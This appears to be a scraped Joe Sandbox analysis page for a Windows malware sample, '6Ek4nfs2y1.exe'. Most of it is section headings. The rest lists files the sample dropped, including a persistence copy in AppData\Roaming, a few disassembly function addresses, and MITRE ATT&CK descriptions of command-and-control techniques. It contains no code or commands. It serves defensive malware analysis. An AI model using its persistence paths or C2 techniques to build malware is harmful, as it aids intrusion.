Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6Ek4nfs2y1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6Ek4nfs2y1.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qulzerug.exe.log

C:\Users\user\AppData\Roaming\Qulzerug.exe

C:\Users\user\AppData\Roaming\Qulzerug.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

Windows Analysis Report
6Ek4nfs2y1.exe

Function 084DDA70 Relevance: .3, Instructions: 276
COMMON

Function 084DEF18 Relevance: 1.6, Strings: 1, Instructions: 341
COMMON

Function 0282FEB8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Function 084DF460 Relevance: .5, Instructions: 478
COMMON

Function 00B9D030 Relevance: .1, Instructions: 74
COMMON

Function 084DF330 Relevance: .1, Instructions: 69
COMMON

Function 00B9D006 Relevance: .1, Instructions: 68
COMMON

Function 084DDEF8 Relevance: .0, Instructions: 46
COMMON

Function 00B8D76D Relevance: .0, Instructions: 45
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre